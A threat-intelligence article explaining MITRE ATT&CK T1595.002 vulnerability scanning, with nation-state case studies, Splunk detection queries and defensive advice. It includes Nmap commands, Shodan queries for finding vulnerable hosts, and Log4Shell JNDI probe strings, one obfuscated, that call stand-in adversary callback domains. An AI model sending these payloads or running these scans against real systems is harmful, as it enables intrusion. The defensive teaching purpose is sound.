analyst @ nohacky :~/mitre $
cat / mitre / t1595.002
analyst@nohacky:~/mitre/t1595002-vulnerability-scanning.html
reading mode 9 min read
technique_id T1595.002
category MITRE ATT&CK
tactics
Reconnaissance
parent_technique T1595 — Active Scanning
published April 2026

T1595.002: Vulnerability Scanning

Adversaries probe internet-facing systems to identify software versions, misconfigurations, and network artifacts that align with known exploitable vulnerabilities. This active reconnaissance step precedes exploitation: the scan results directly inform which CVEs to weaponize, which targets are worth pursuing, and which initial access techniques are most likely to succeed. Over a dozen nation-state and criminal groups document this technique as a standard pre-intrusion activity.

Vulnerability scanning occupies the earliest observable phase of a targeted intrusion. Before an adversary attempts to exploit a system, they need to know what software is running on it, what version that software is, and whether any known vulnerabilities apply. T1595.002 formalizes this reconnaissance in the MITRE ATT&CK framework as a sub-technique of Active Scanning (T1595), distinguishing targeted vulnerability enumeration from broader IP block scanning (T1595.001) and wordlist-based content discovery (T1595.003).

The technique operates at the PRE platform level — meaning it takes place before any systems are compromised — and falls under the Reconnaissance tactic (TA0043). Information gathered through vulnerability scanning feeds directly into subsequent ATT&CK stages: it identifies targets for Exploit Public-Facing Application (T1190), informs capability development and acquisition (T1587, T1588), and may reveal opportunities for further passive reconnaissance through open technical databases and search engine indexing.

scale of the problem

F5 Labs observed a 71% increase in vulnerability scanning traffic on their sensor network between 2023 and 2024 — approximately 8.7 million HTTP requests targeting specific CVEs in 2024 alone, up from 5.1 million in 2023. This figure represents only CVE-specific probes and excludes the far larger volume of general reconnaissance traffic. Any system exposed to the internet should be treated as continuously scanned.

How Vulnerability Scanning Works

Adversary vulnerability scanning typically proceeds through two stages: broad surface mapping to identify live hosts and open services, followed by targeted probing to enumerate software versions and check specific vulnerability conditions.

Surface Mapping — Port and Service Discovery

Nmap remains the most widely used tool for port scanning and service version detection. A typical pre-intrusion scan combines SYN scanning to identify open ports, service version detection to read application banners, and OS fingerprinting to identify the underlying operating system:

# Nmap service version detection across common internet-facing ports
# -sV: probe open ports to determine service and version
# -sC: run default scripts for additional info gathering
# --open: only show open ports
nmap -sV -sC --open -p 22,80,443,8080,8443,3389,445,21,25 target.example.com

# Aggressive scan including OS detection — generates more noise
nmap -A -T4 target.example.com

Masscan trades depth for speed, scanning the entire IPv4 address space in minutes when run from adequate bandwidth. Nation-state groups — particularly Ember Bear (GRU Unit 29155) — have used Masscan to rapidly identify vulnerable targets across broad IP ranges, then feed the results into more targeted follow-up scans. Masscan is particularly effective for identifying internet-wide exposure of specific ports associated with a newly disclosed vulnerability.

Passive Indexing Services — Shodan and Censys

Adversaries do not always need to send traffic directly to a target. Internet scanning services including Shodan, Censys, and FOFA continuously crawl and index internet-accessible services, storing banner information, TLS certificates, HTTP headers, and software version strings. An adversary can query Shodan for all hosts running a specific vulnerable software version — for example, all Exchange servers exposing an OWA login page on a specific build number — without ever sending a packet to those servers directly.

GRU Unit 29155 cyber actors were specifically documented in the September 2024 CISA advisory as using Shodan to identify IoT devices and scan for internet-connected hosts with specific vulnerability profiles before attempting exploitation. APT40 (PRC Ministry of State Security) similarly leverages internet scanning services to identify vulnerable, end-of-life, or unpatched devices as reconnaissance prior to rapid exploitation.

# Example Shodan queries used in adversary reconnaissance
# Find Apache servers exposing version in banner
apache version:2.4.49    # identifies CVE-2021-41773 candidates

# Find Ivanti Connect Secure instances
http.title:"Please Login" product:"Ivanti Connect Secure"

# Find exposed Exchange OWA login pages
http.title:"Outlook Web App" http.component:"Microsoft Exchange"

# Find devices with default credentials still exposed
default password http.component:"Hikvision"

Application-Layer Vulnerability Scanners

Beyond port and service enumeration, adversaries deploy specialized application-layer scanners against identified web targets. Acunetix performs automated web application scanning including SQL injection detection, XSS testing, and directory traversal probing. APT41 used Acunetix in target reconnaissance operations to identify SQL injection vulnerabilities, and Winter Vivern has used remotely hosted Acunetix instances against government and defense web portals. JexBoss specifically targets Java application servers (JBoss, WildFly) for known deserialization and remote code execution vulnerabilities — APT41 has used this tool to enumerate Java application vulnerabilities as part of pre-intrusion reconnaissance.

CVE-Targeted Probing

When a high-value CVE is disclosed publicly, nation-state actors frequently begin scanning within hours. Magic Hound (APT35, Charming Kitten) scanned for Log4Shell (CVE-2021-44228), ProxyShell Exchange vulnerabilities, and Fortinet FortiOS VPN flaws shortly after disclosure. Aquatic Panda used DNS logging services to identify Log4j-vulnerable servers by sending specially crafted JNDI lookup strings in HTTP headers to target systems and monitoring for outbound DNS callbacks to identify vulnerable instances. This callback-based approach is particularly valuable because it requires no direct response — the target system reveals its vulnerability by making an outbound DNS request to an adversary-controlled domain.

# Log4Shell detection probe pattern (sent as HTTP header values)
# Vulnerable Log4j instances make outbound JNDI DNS lookups
# Adversaries monitor their DNS server for callbacks

User-Agent: ${jndi:ldap://adversary-dns-server.com/scan-id}
X-Api-Version: ${jndi:dns://adversary-dns-server.com/CVE-2021-44228}
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:ldap://callback.adversary.com/}

Real-World Case Studies

APT40 / Leviathan — Rapid Exploitation Targeting End-of-Life Devices

The July 2024 joint advisory from CISA, ASD, NCSC, and partner agencies on APT40 tradecraft documented the group's systematic reconnaissance of target networks specifically searching for vulnerable, end-of-life, and no longer maintained devices. APT40 exploits vulnerabilities in public-facing infrastructure rapidly — often within hours of public disclosure — by maintaining an ongoing picture of their targets' external attack surface through continuous scanning and monitoring of vulnerability databases and exploit repositories. The advisory noted that APT40 pays particular attention to devices that organizations may deprioritize for patching due to legacy status, using vulnerability scanning to identify precisely the systems most likely to remain unpatched.

Ember Bear / GRU Unit 29155 — MASSCAN and Acunetix Against Critical Infrastructure

Ember Bear, documented in the September 2024 CISA advisory on Russian military cyber actors targeting US and global critical infrastructure, used publicly available tools including MASSCAN and Acunetix as core components of their pre-intrusion reconnaissance workflow. MASSCAN enabled rapid identification of open ports and services across broad IP ranges associated with target infrastructure. Acunetix provided web application vulnerability discovery against identified public-facing hosts. The advisory also specifically documented the group's use of Shodan to identify internet-connected IoT devices, including IP cameras, which were then accessed using default credentials — demonstrating how scanning reconnaissance feeds directly into T1078 (Valid Accounts) exploitation via discovered default credentials.

Magic Hound — Scanning for Log4Shell Within Hours of Disclosure

In December 2021, Magic Hound (APT35, Iran) began scanning for Log4Shell-vulnerable servers within hours of CVE-2021-44228's public disclosure. Check Point documented the group deploying a custom PowerShell toolkit against Log4j-vulnerable targets identified through active scanning. Magic Hound had previously demonstrated the same rapid scanning pattern against ProxyShell Exchange vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) and Fortinet FortiOS flaws (CVE-2018-13379). The consistency of this pattern illustrates how vulnerability scanning is not a one-time activity but an ongoing operational process — these groups maintain continuous awareness of their targets' patch status across many CVEs simultaneously.

APT41 — Acunetix and JexBoss in Targeted Web Application Reconnaissance

APT41 deployed Acunetix web application scanners against targets during reconnaissance operations to identify SQL injection vulnerabilities, supplementing general web application scanning with JexBoss for Java-specific vulnerability enumeration. CrowdStrike and Mandiant reporting on APT41 activity documented this combination of commercial and open-source scanning tools being used against organizations across government, manufacturing, healthcare, and technology sectors. APT41's scanning activity was specifically designed to identify web application entry points that could provide initial access into broader enterprise networks, with the scan results directly informing subsequent exploitation decisions.

Detection Strategies

Detecting vulnerability scanning is inherently challenging because scanning traffic arrives from the public internet in a high-noise environment where background scanning from security researchers, search engines, and opportunistic bots is constant. The key challenge is distinguishing targeted adversary scanning from background noise and prioritizing response accordingly.

Web Application Firewall and IDS — Scanner Detection

# Splunk: detect known vulnerability scanner user-agent strings in web logs
index=web sourcetype=access_combined
| search useragent IN (
    "*Acunetix*",
    "*Nikto*",
    "*sqlmap*",
    "*Nessus*",
    "*OpenVAS*",
    "*masscan*",
    "*zgrab*",
    "*nuclei*"
)
| stats count by clientip, useragent, uri_path
| sort - count
# Splunk: detect rapid sequential requests testing multiple vulnerability payloads
# Characteristic of automated scanners probing a single endpoint
index=web sourcetype=access_combined
| bucket _time span=60s
| stats count as req_count, dc(uri_path) as paths_tested by _time, clientip
| where req_count > 100 AND paths_tested > 20
| sort - req_count

Network Layer — Scan Pattern Detection

# Splunk: detect SYN scan patterns — many ports, single source, within time window
index=network sourcetype=firewall action=deny
| bucket _time span=30s
| stats dc(dest_port) as ports_scanned, count by _time, src_ip
| where ports_scanned > 50
| sort - ports_scanned

Behavioral Indicators

Indicator What It Means
Single source IP generating requests to a large number of distinct URI paths within a short time window Automated vulnerability scanner or directory brute-force — characteristic of Acunetix, Nikto, and Nuclei scanning patterns
Known scanner user-agent strings (Acunetix, sqlmap, Nikto, masscan, zgrab) appearing in web access logs Adversary using commercial or open-source scanning tooling without user-agent spoofing — provides direct tool attribution if confirmed as targeted
Outbound DNS queries from internal systems to domains following a JNDI lookup pattern (e.g., ldap:// or dns:// prefixes in query strings) Possible Log4Shell callback — the target system may be probing an adversary-controlled DNS server after receiving a crafted payload in an HTTP header
Large number of denied connections to a range of sequential destination ports from a single external source IP Port scan in progress — network-layer indicator for T1595.001/T1595.002 combined activity mapping open services before vulnerability probing
HTTP requests containing SQL injection, path traversal, or template injection payloads in query strings or POST bodies Application-layer vulnerability probing — direct scanning for exploitable input handling, characteristic of Acunetix and sqlmap activity

Known Threat Actors Using T1595.002

Vulnerability scanning is a near-universal pre-intrusion technique among sophisticated threat actors. The following groups are specifically documented by MITRE ATT&CK and supporting intelligence reporting as users of this technique.

  • APT40 / Leviathan (China, MSS) — Systematically scans target networks for vulnerable, end-of-life, and unpatched internet-facing devices. Documented in the 2024 joint CISA/ASD/NCSC APT40 tradecraft advisory as exploiting newly disclosed CVEs within hours of public disclosure following active scanning to identify candidates.
  • APT41 / BARIUM (China, dual espionage/cybercrime) — Uses Acunetix for SQL injection vulnerability scanning and JexBoss for Java application server reconnaissance against targets across multiple sectors.
  • Ember Bear / GRU Unit 29155 (Russia, GRU) — Uses MASSCAN for rapid internet-wide port scanning, Acunetix for web application vulnerability discovery, and Shodan for passive identification of vulnerable IoT devices and network infrastructure.
  • Magic Hound / APT35 (Iran, IRGC) — Conducts rapid scanning for newly disclosed CVEs, specifically documented scanning for Log4Shell, ProxyShell, and Fortinet FortiOS vulnerabilities within hours of public disclosure.
  • APT28 / Fancy Bear (Russia, GRU) — Has conducted large-scale scanning for exploitable servers as part of pre-intrusion reconnaissance supporting subsequent credential-based and exploitation-based initial access operations.
  • Dragonfly / TEMP.Isotope (Russia) — Scanned for vulnerable Citrix and Exchange services as part of reconnaissance against energy sector and critical infrastructure targets.
  • Winter Vivern (Belarus/Russia-aligned) — Uses remotely hosted Acunetix instances for vulnerability scanning of government and defense web portals as part of espionage operations targeting European government entities.
  • TeamTNT (cybercrime, cloud-focused) — Conducts scanning of cloud infrastructure and container environments to identify misconfigured Docker APIs and vulnerable Kubernetes deployments for cryptomining deployment.

Defensive Recommendations

  1. Conduct continuous external attack surface management: Defenders should have better visibility into their own external attack surface than adversaries. Deploy attack surface management (ASM) tools that continuously enumerate internet-exposed assets, identify outdated software versions, and flag exposure of services that should not be publicly accessible. Organizations that identify and remediate vulnerabilities before scanning adversaries discover them eliminate the intelligence value of T1595.002 against their environment.
  2. Suppress version information from server banners and HTTP headers: Server banners, HTTP response headers (Server:, X-Powered-By:, X-AspNet-Version:), and application error messages often reveal precise software versions that adversary scanners harvest to identify vulnerability targets. Configure web servers, application servers, and network appliances to suppress detailed version strings. This does not prevent exploitation of known vulnerabilities, but it forces adversaries to attempt blind exploitation rather than targeted version-matched attacks, increasing their noise footprint and reducing precision.
  3. Prioritize patching internet-facing services — particularly within 24 hours of critical CVE disclosure: The documented pattern of nation-state groups (APT40, Magic Hound) scanning for new CVEs within hours of public disclosure makes rapid patching of internet-facing systems a critical defensive priority. Maintain an inventory of all public-facing software and subscribe to vendor security advisories for each product. Implement a policy that critical CVEs in internet-facing systems receive emergency patch review within 24 hours, with patching completed before adversarial scanning is likely to have identified your exposure.
  4. Deploy WAF rules to detect and rate-limit scanner traffic: Web application firewalls can identify and block or rate-limit traffic exhibiting scanning patterns — sequential requests to non-existent paths, known scanner user-agent strings, SQL injection and path traversal probes in query strings. Scanner detection rules reduce the completeness of information adversaries can gather about web application attack surfaces. Combine WAF rules with IP reputation feeds that flag known scanning infrastructure.
  5. Monitor your own exposure through adversary tooling: Run Shodan, Censys, and FOFA queries against your own organization's IP ranges and domain names to see what adversaries see. This passive assessment reveals services that may have been inadvertently exposed, outdated software versions visible in banners, and certificates or metadata that could inform adversary targeting. Incorporate this into regular security reviews — ideally automated and scheduled monthly.
  6. Implement network segmentation to limit what scanning can reach: Services that do not require direct internet access should not be reachable from the internet. Implement network segmentation and firewall rules that expose only the minimal set of services required for business operations. Internal administrative interfaces, database ports, backup systems, and development infrastructure should never be reachable from external scanning sources. Every service eliminated from the internet-exposed attack surface is a target that vulnerability scanning cannot find.
  7. Alert on callback-based CVE probes in DNS and HTTP logs: Log4Shell-style callback probes can be detected by monitoring for outbound DNS queries to unusual domains following receipt of crafted HTTP requests, or by monitoring network egress for LDAP/RMI connections initiated by application server processes. Configure DNS filtering and monitoring to flag lookups to domains that follow adversary infrastructure patterns, and alert on application server processes making unexpected outbound network connections.

MITRE ATT&CK Mapping

Field Value
Technique IDT1595.002
Technique NameActive Scanning: Vulnerability Scanning
Parent TechniqueT1595 — Active Scanning
TacticReconnaissance (TA0043)
PlatformsPRE (pre-compromise activity)
Data SourcesNetwork Traffic: Network Traffic Content; Network Traffic: Network Traffic Flow
MitigationsM1056 Pre-compromise (limit information available to adversaries through attack surface reduction)
ATT&CK Versionv18 (Version 1.0, Last Modified: 15 April 2021)
MITRE Referenceattack.mitre.org/techniques/T1595/002

Frequently Asked Questions

What is T1595.002 Vulnerability Scanning?

T1595.002 Vulnerability Scanning is a MITRE ATT&CK Reconnaissance sub-technique in which adversaries actively probe internet-facing systems to identify configurations, software versions, and network artifacts that match known exploitable vulnerabilities. Unlike passive reconnaissance that relies on existing data sources, active vulnerability scanning sends direct network traffic to target systems to enumerate their attack surface before exploitation attempts.

What tools do adversaries use for vulnerability scanning?

Nation-state and criminal groups use both general-purpose and specialized tools. Nmap provides port scanning and service/version detection. Masscan performs high-speed internet-wide port sweeps. Shodan and Censys index internet-exposed services and can be queried for specific software versions or configurations without sending traffic to the target. Acunetix performs automated web application vulnerability scanning. JexBoss targets Java application server vulnerabilities. Custom scripts probe for specific CVEs within hours of public disclosure.

How can organizations defend against vulnerability scanning?

Defenders cannot prevent all scanning since it originates from the public internet, but they can reduce its value and detect it. Key measures include minimizing the external attack surface by disabling unnecessary services, suppressing detailed version information from server banners and HTTP headers, deploying WAF rate limiting and scanner detection rules, monitoring for scanning patterns in network and web logs, and — most importantly — conducting regular internal vulnerability assessments to find and remediate weaknesses before adversaries can exploit what they discover.

Sources and References

  • MITRE ATT&CK — T1595.002 Active Scanning: Vulnerability Scanning: attack.mitre.org
  • CISA / ASD / NCSC et al. — People's Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action (July 2024): cisa.gov
  • CISA / FBI / NSA et al. — Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure (AA24-249A, September 2024): cisa.gov
  • Check Point Research — APT35 Exploits Log4j Vulnerability to Distribute New Modular PowerShell Toolkit: research.checkpoint.com
  • CrowdStrike — OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools: crowdstrike.com
  • F5 Labs — Analyzing the Global Increase in Vulnerability Scanning in 2024: f5.com
  • Mandiant — Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts: mandiant.com
  • SentinelOne — Winter Vivern: Uncovering a Wave of Global Espionage: sentinelone.com
cd ../mitre